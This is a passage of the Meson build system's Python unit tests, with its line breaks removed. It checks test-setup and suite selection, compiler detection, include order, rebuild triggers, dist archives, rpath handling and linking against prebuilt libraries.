testdir = os.path.join(self.unit_test_dir, '14 testsetup selection') self.init(testdir) self.build() # Run tests without setup self.run_tests() self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo']) self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=worksforall']) self._run(self.mtest_command + ['--setup=main:worksforall']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:']) self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=bar:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=foo:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=main:onlyinbar']) def test_testsetup_default(self): testdir = os.path.join(self.unit_test_dir, '49 testsetup default') self.init(testdir) self.build() # Run tests without --setup will cause the default setup to be used self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: default_log = f.read() # Run tests with explicitly using the same setup that is set as default self._run(self.mtest_command + ['--setup=mydefault']) with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f: mydefault_log = f.read() # Run tests with another setup self._run(self.mtest_command + ['--setup=other']) with open(os.path.join(self.logdir, 'testlog-other.txt')) as f: other_log = f.read() self.assertTrue('ENV_A is 1' in default_log) self.assertTrue('ENV_B is 2' in default_log) self.assertTrue('ENV_C is 2' in default_log) self.assertTrue('ENV_A is 1' in mydefault_log) self.assertTrue('ENV_B is 2' in mydefault_log) self.assertTrue('ENV_C is 2' in mydefault_log) self.assertTrue('ENV_A is 1' in other_log) self.assertTrue('ENV_B is 3' in other_log) self.assertTrue('ENV_C is 2' in other_log) def assertFailedTestCount(self, failure_count, command): try: self._run(command) self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count) except subprocess.CalledProcessError as e: self.assertEqual(e.returncode, failure_count) def test_suite_selection(self): testdir = os.path.join(self.unit_test_dir, '4 suite selection') self.init(testdir) self.build() self.assertFailedTestCount(4, self.mtest_command) self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success']) self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test']) self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail']) def test_build_by_default(self): testdir = os.path.join(self.common_test_dir, '130 build by default') self.init(testdir) self.build() genfile1 = os.path.join(self.builddir, 'generated1.dat') genfile2 = os.path.join(self.builddir, 'generated2.dat') exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix) exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix) self.assertPathExists(genfile1) self.assertPathExists(genfile2) self.assertPathDoesNotExist(exe1) self.assertPathDoesNotExist(exe2) self.build(target=('fooprog' + exe_suffix)) self.assertPathExists(exe1) self.build(target=('barprog' + exe_suffix)) self.assertPathExists(exe2) def test_internal_include_order(self): if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ): raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2') testdir = os.path.join(self.common_test_dir, '131 include order') self.init(testdir) execmd = fxecmd = None for cmd in self.get_compdb(): if 'someexe' in cmd['command']: execmd = cmd['command'] continue if 'somefxe' in cmd['command']: fxecmd = cmd['command'] continue if not execmd or not fxecmd: raise Exception('Could not find someexe and somfxe commands') # Check include order for 'someexe' incs = [a for a in split_args(execmd) if a.startswith("-I")] self.assertEqual(len(incs), 9) # Need to run the build so the private dir is created. self.build() pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], "-I" + privdir) # target build subdir self.assertPathEqual(incs[1], "-Isub4") # target source subdir self.assertPathBasenameEqual(incs[2], 'sub4') # include paths added via per-target c_args: ['-I'...] self.assertPathBasenameEqual(incs[3], 'sub3') # target include_directories: build dir self.assertPathEqual(incs[4], "-Isub2") # target include_directories: source dir self.assertPathBasenameEqual(incs[5], 'sub2') # target internal dependency include_directories: build dir self.assertPathEqual(incs[6], "-Isub1") # target internal dependency include_directories: source dir self.assertPathBasenameEqual(incs[7], 'sub1') # custom target include dir self.assertPathEqual(incs[8], '-Ictsub') # Check include order for 'somefxe' incs = [a for a in split_args(fxecmd) if a.startswith('-I')] self.assertEqual(len(incs), 9) # target private dir pdirs = glob(os.path.join(self.builddir, 'somefxe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], '-I' + privdir) # target build dir self.assertPathEqual(incs[1], '-I.') # target source dir self.assertPathBasenameEqual(incs[2], os.path.basename(testdir)) # target internal dependency correct include_directories: build dir self.assertPathEqual(incs[3], "-Isub4") # target internal dependency correct include_directories: source dir self.assertPathBasenameEqual(incs[4], 'sub4') # target internal dependency dep include_directories: build dir self.assertPathEqual(incs[5], "-Isub1") # target internal dependency dep include_directories: source dir self.assertPathBasenameEqual(incs[6], 'sub1') # target internal dependency wrong include_directories: build dir self.assertPathEqual(incs[7], "-Isub2") # target internal dependency wrong include_directories: source dir self.assertPathBasenameEqual(incs[8], 'sub2') def test_compiler_detection(self): ''' Test that automatic compiler detection and setting from the environment both work just fine. This is needed because while running project tests and other unit tests, we always read CC/CXX/etc from the environment. ''' gnu = mesonbuild.compilers.GnuCompiler clang = mesonbuild.compilers.ClangCompiler intel = mesonbuild.compilers.IntelGnuLikeCompiler msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler) clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler) ar = mesonbuild.linkers.ArLinker lib = mesonbuild.linkers.VisualStudioLinker langs = [('c', 'CC'), ('cpp', 'CXX')] if not is_windows() and platform.machine().lower() != 'e2k': langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')] testdir = os.path.join(self.unit_test_dir, '5 compiler detection') env = get_fake_env(testdir, self.builddir, self.prefix) for lang, evar in langs: # Detect with evar and do sanity checks on that if evar in os.environ: ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(ecc.version) elinker = env.detect_static_linker(ecc) # Pop it so we don't use it for the next detection evalue = os.environ.pop(evar) # Very rough/strict heuristics. Would never work for actual # compiler detection, but should be ok for the tests. ebase = os.path.basename(evalue) if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')): self.assertIsInstance(ecc, gnu) self.assertIsInstance(elinker, ar) elif 'clang-cl' in ebase: self.assertIsInstance(ecc, clangcl) self.assertIsInstance(elinker, lib) elif 'clang' in ebase: self.assertIsInstance(ecc, clang) self.assertIsInstance(elinker, ar) elif ebase.startswith('ic'): self.assertIsInstance(ecc, intel) self.assertIsInstance(elinker, ar) elif ebase.startswith('cl'): self.assertIsInstance(ecc, msvc) self.assertIsInstance(elinker, lib) else: raise AssertionError('Unknown compiler {!r}'.format(evalue)) # Check that we actually used the evalue correctly as the compiler self.assertEqual(ecc.get_exelist(), split_args(evalue)) # Do auto-detection of compiler based on platform, PATH, etc. cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(cc.version) linker = env.detect_static_linker(cc) # Check compiler type if isinstance(cc, gnu): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_sunos(): self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, clangcl): self.assertIsInstance(linker, lib) self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker) if isinstance(cc, clang): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): # This is clang, not clang-cl. This can be either an # ld-like linker of link.exe-like linker (usually the # former for msys2, the latter otherwise) self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, intel): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker) if isinstance(cc, msvc): self.assertTrue(is_windows()) self.assertIsInstance(linker, lib) self.assertEqual(cc.id, 'msvc') self.assertTrue(hasattr(cc, 'is_64')) self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker) # If we're on Windows CI, we know what the compiler will be if 'arch' in os.environ: if os.environ['arch'] == 'x64': self.assertTrue(cc.is_64) else: self.assertFalse(cc.is_64) # Set evar ourselves to a wrapper script that just calls the same # exelist + some argument. This is meant to test that setting # something like `ccache gcc -pipe` or `distcc ccache gcc` works. wrapper = os.path.join(testdir, 'compiler wrapper.py') wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG'] os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc) # Check static linker too wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args() os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker) # Need a new env to re-run environment loading env = get_fake_env(testdir, self.builddir, self.prefix) wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) wlinker = env.detect_static_linker(wcc) # Pop it so we don't use it for the next detection evalue = os.environ.pop('AR') # Must be the same type since it's a wrapper around the same exelist self.assertIs(type(cc), type(wcc)) self.assertIs(type(linker), type(wlinker)) # Ensure that the exelist is correct self.assertEqual(wcc.get_exelist(), wrappercc) self.assertEqual(wlinker.get_exelist(), wrapperlinker) # Ensure that the version detection worked correctly self.assertEqual(cc.version, wcc.version) if hasattr(cc, 'is_64'): self.assertEqual(cc.is_64, wcc.is_64) def test_always_prefer_c_compiler_for_asm(self): testdir = os.path.join(self.common_test_dir, '134 c cpp and asm') # Skip if building with MSVC env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc': raise unittest.SkipTest('MSVC can\'t compile assembly') self.init(testdir) commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}} for cmd in self.get_compdb(): # Get compiler split = split_args(cmd['command']) if split[0] == 'ccache': compiler = split[1] else: compiler = split[0] # Classify commands if 'Ic-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-asm']['c'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Icpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Ic-cpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-cpp-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['c-cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command'])) elif 'Icpp-c-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['cpp-c-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-c-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command'])) else: raise AssertionError('Unknown command {!r} found'.format(cmd['command'])) # Check that .S files are always built with the C compiler self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c']) self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm']) self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c']) self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp']) self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp']) self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp']) # Check that the c-asm target is always linked with the C linker build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('build c-asm.*: c_LINKER', contents) self.assertIsNotNone(m, msg=contents) def test_preprocessor_checks_CPPFLAGS(self): ''' Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but not LDFLAGS. ''' testdir = os.path.join(self.common_test_dir, '133 get define') define = 'MESON_TEST_DEFINE_VALUE' # NOTE: this list can't have \n, ' or " # \n is never substituted by the GNU pre-processor via a -D define # ' and " confuse split_args() even when they are escaped # % and # confuse the MSVC preprocessor # !, ^, *, and < confuse lcc preprocessor value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`' for env_var in ['CPPFLAGS', 'CFLAGS']: env = {} env[env_var] = '-D{}="{}"'.format(define, value) env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define) self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env) def test_custom_target_exe_data_deterministic(self): testdir = os.path.join(self.common_test_dir, '110 custom target capture') self.init(testdir) meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.wipe() self.init(testdir) meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.assertListEqual(meson_exe_dat1, meson_exe_dat2) def test_noop_changes_cause_no_rebuilds(self): ''' Test that no-op changes to the build files such as mtime do not cause a rebuild of anything. ''' testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of meson.build should not rebuild anything self.utime(os.path.join(testdir, 'meson.build')) self.assertReconfiguredBuildIsNoop() # Changing mtime of libefile.c should rebuild the library, but not relink the executable self.utime(os.path.join(testdir, 'libfile.c')) self.assertBuildRelinkedOnlyTarget('mylib') def test_source_changes_cause_rebuild(self): ''' Test that changes to sources and headers cause rebuilds, but not changes to unused files (as determined by the dependency file) in the input files list. ''' testdir = os.path.join(self.common_test_dir, '20 header in file list') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of header.h should rebuild everything self.utime(os.path.join(testdir, 'header.h')) self.assertBuildRelinkedOnlyTarget('prog') def test_custom_target_changes_cause_rebuild(self): ''' Test that in a custom target, changes to the input files, the ExternalProgram, and any File objects on the command-line cause a rebuild. ''' testdir = os.path.join(self.common_test_dir, '58 custom header generator') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of these should rebuild everything for f in ('input.def', 'makeheader.py', 'somefile.txt'): self.utime(os.path.join(testdir, f)) self.assertBuildRelinkedOnlyTarget('prog') def test_source_generator_program_cause_rebuild(self): ''' Test that changes to generator programs in the source tree cause a rebuild. ''' testdir = os.path.join(self.common_test_dir, '91 gen extra') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of generator should rebuild the executable self.utime(os.path.join(testdir, 'srcgen.py')) self.assertRebuiltTarget('basic') def test_static_library_lto(self): ''' Test that static libraries can be built with LTO and linked to executables. On Linux, this requires the use of gcc-ar. https://github.com/mesonbuild/meson/issues/1646 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows(): raise unittest.SkipTest('LTO not (yet) supported by windows clang') self.init(testdir, extra_args='-Db_lto=true') self.build() self.run_tests() def test_dist_git(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: self.dist_impl(_git_init) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def has_working_hg(self): if not shutil.which('hg'): return False try: # This check should not be necessary, but # CI under macOS passes the above test even # though Mercurial is not installed. if subprocess.call(['hg', '--version'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: return False return True except FileNotFoundError: return False def test_dist_hg(self): if not self.has_working_hg(): raise unittest.SkipTest('Mercurial not found or broken.') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') def hg_init(project_dir): subprocess.check_call(['hg', 'init'], cwd=project_dir) with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f: print('[ui]', file=f) print('username=Author Person <teh_coderz@example.com>', file=f) subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir) subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir) try: self.dist_impl(hg_init, include_subprojects=False) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the hg files so cleaning up the dir # fails sometimes. pass def test_dist_git_script(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: with tempfile.TemporaryDirectory() as tmpdir: project_dir = os.path.join(tmpdir, 'a') shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'), project_dir) _git_init(project_dir) self.init(project_dir) self.build('dist') except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def create_dummy_subproject(self, project_dir, name): path = os.path.join(project_dir, 'subprojects', name) os.makedirs(path) with open(os.path.join(path, 'meson.build'), 'w') as ofile: ofile.write("project('{}')".format(name)) return path def dist_impl(self, vcs_init, include_subprojects=True): # Create this on the fly because having rogue .git directories inside # the source tree leads to all kinds of trouble. with tempfile.TemporaryDirectory() as project_dir: with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile: ofile.write(textwrap.dedent('''\ project('disttest', 'c', version : '1.4.3') e = executable('distexe', 'distexe.c') test('dist test', e) subproject('vcssub', required : false) subproject('tarballsub', required : false) ''')) with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile: ofile.write(textwrap.dedent('''\ #include<stdio.h> int main(int argc, char **argv) { printf("I am a distribution test.\\n"); return 0; } ''')) xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz') xz_checksumfile = xz_distfile + '.sha256sum' zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip') zip_checksumfile = zip_distfile + '.sha256sum' vcs_init(project_dir) if include_subprojects: vcs_init(self.create_dummy_subproject(project_dir, 'vcssub')) self.create_dummy_subproject(project_dir, 'tarballsub') self.create_dummy_subproject(project_dir, 'unusedsub') self.init(project_dir) self.build('dist') self.assertPathExists(xz_distfile) self.assertPathExists(xz_checksumfile) self.assertPathDoesNotExist(zip_distfile) self.assertPathDoesNotExist(zip_checksumfile) self._run(self.meson_command + ['dist', '--formats', 'zip'], workdir=self.builddir) self.assertPathExists(zip_distfile) self.assertPathExists(zip_checksumfile) if include_subprojects: z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c']), sorted(z.namelist())) self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'], workdir=self.builddir) z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/subprojects/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c', 'disttest-1.4.3/subprojects/tarballsub/', 'disttest-1.4.3/subprojects/vcssub/', 'disttest-1.4.3/subprojects/tarballsub/meson.build', 'disttest-1.4.3/subprojects/vcssub/meson.build']), sorted(z.namelist())) def test_rpath_uses_ORIGIN(self): ''' Test that built targets use $ORIGIN in rpath, which ensures that they are relocatable and ensures that builds are reproducible since the build directory won't get embedded into the built binaries. ''' if is_windows() or is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.common_test_dir, '40 library chain') self.init(testdir) self.build() for each in ('prog', 'subdir/liblib1.so', ): rpath = get_rpath(os.path.join(self.builddir, each)) self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each)) if is_dragonflybsd(): # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath, # so ignore that. self.assertTrue(rpath.startswith('/usr/lib/gcc')) rpaths = rpath.split(':')[1:] else: rpaths = rpath.split(':') for path in rpaths: self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path)) # These two don't link to anything else, so they do not need an rpath entry. for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'): rpath = get_rpath(os.path.join(self.builddir, each)) if is_dragonflybsd(): # The rpath should be equal to /usr/lib/gccVERSION self.assertTrue(rpath.startswith('/usr/lib/gcc')) self.assertEqual(len(rpath.split(':')), 1) else: self.assertTrue(rpath is None) def test_dash_d_dedup(self): testdir = os.path.join(self.unit_test_dir, '9 d dedup') self.init(testdir) cmd = self.get_compdb()[0]['command'] self.assertTrue('-D FOO -D BAR' in cmd or '"-D" "FOO" "-D" "BAR"' in cmd or '/D FOO /D BAR' in cmd or '"/D" "FOO" "/D" "BAR"' in cmd) def test_all_forbidden_targets_tested(self): ''' Test that all forbidden targets are tested in the '151 reserved targets' test. Needs to be a unit test because it accesses Meson internals. ''' testdir = os.path.join(self.common_test_dir, '151 reserved targets') targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES # We don't actually define a target with this name targets.pop('build.ninja') # Remove this to avoid multiple entries with the same name # but different case. targets.pop('PHONY') for i in targets: self.assertPathExists(os.path.join(testdir, i)) def detect_prebuild_env(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) stlinker = env.detect_static_linker(cc) if mesonbuild.mesonlib.is_windows(): object_suffix = 'obj' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_cygwin(): object_suffix = 'o' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_osx(): object_suffix = 'o' shared_suffix = 'dylib' else: object_suffix = 'o' shared_suffix = 'so' return (cc, stlinker, object_suffix, shared_suffix) def pbcompile(self, compiler, source, objectfile, extra_args=None): cmd = compiler.get_exelist() extra_args = extra_args or [] if compiler.get_argument_syntax() == 'msvc': cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args else: cmd += ['-c', source, '-o', objectfile] + extra_args subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def test_prebuilt_object(self): (compiler, _, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '15 prebuilt object') source = os.path.join(tdir, 'source.c') objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix) self.pbcompile(compiler, source, objectfile) try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(objectfile) def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile] else: link_cmd = ['ar', 'csr', outfile, objectfile] link_cmd = linker.get_exelist() link_cmd += linker.get_always_args() link_cmd += linker.get_std_link_args() link_cmd += linker.get_output_args(outfile) link_cmd += [objectfile] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_static_lib(self): (cc, stlinker, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '16 prebuilt static') source = os.path.join(tdir, 'libdir/best.c') objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix) stlibfile = os.path.join(tdir, 'libdir/libbest.a') self.build_static_lib(cc, stlinker, source, objectfile, stlibfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(stlibfile) def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = compiler.get_linker_exelist() + [ '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile, '/OUT:' + outfile, objectfile] else: if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()): extra_args += ['-fPIC'] link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile] if not mesonbuild.mesonlib.is_osx(): link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_shared_lib(self): (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared') source = os.path.join(tdir, 'alexandria.c') objectfile = os.path.join(tdir, 'alexandria.' + object_suffix) impfile = os.path.join(tdir, 'alexandria.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix) elif is_cygwin(): shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix) else: shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the garbage MSVC writes in the # source tree. for fname in glob(os.path.join(tdir, 'alexandria.*')): if os.path.splitext(fname)[1] not in ['.c', '.h']: os.unlink(fname) @skipIfNoPkgconfig def test_pkgconfig_static(self): ''' Test that the we prefer static libraries when `static: true` is passed to dependency() with pkg-config. Can't be an ordinary test because we need to build libs and try to find them from meson.build Also test that it's not a hard error to have unsatisfiable library deps since system libraries -lm will never be found statically. https://github.com/mesonbuild/meson/issues/2785 ''' (cc, stlinker, objext, shext) = self.detect_prebuild_env() testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static') source = os.path.join(testdir, 'foo.c') objectfile = os.path.join(testdir, 'foo.' + objext) stlibfile = os.path.join(testdir, 'libfoo.a') impfile = os.path.join(testdir, 'foo.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(testdir, 'foo.' + shext) elif is_cygwin(): shlibfile = os.path.join(testdir, 'cygfoo.' + shext) else: shlibfile = os.path.join(testdir, 'libfoo.' + shext) # Build libs self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC']) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run test try: self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir}) self.build() self.run_tests() finally: 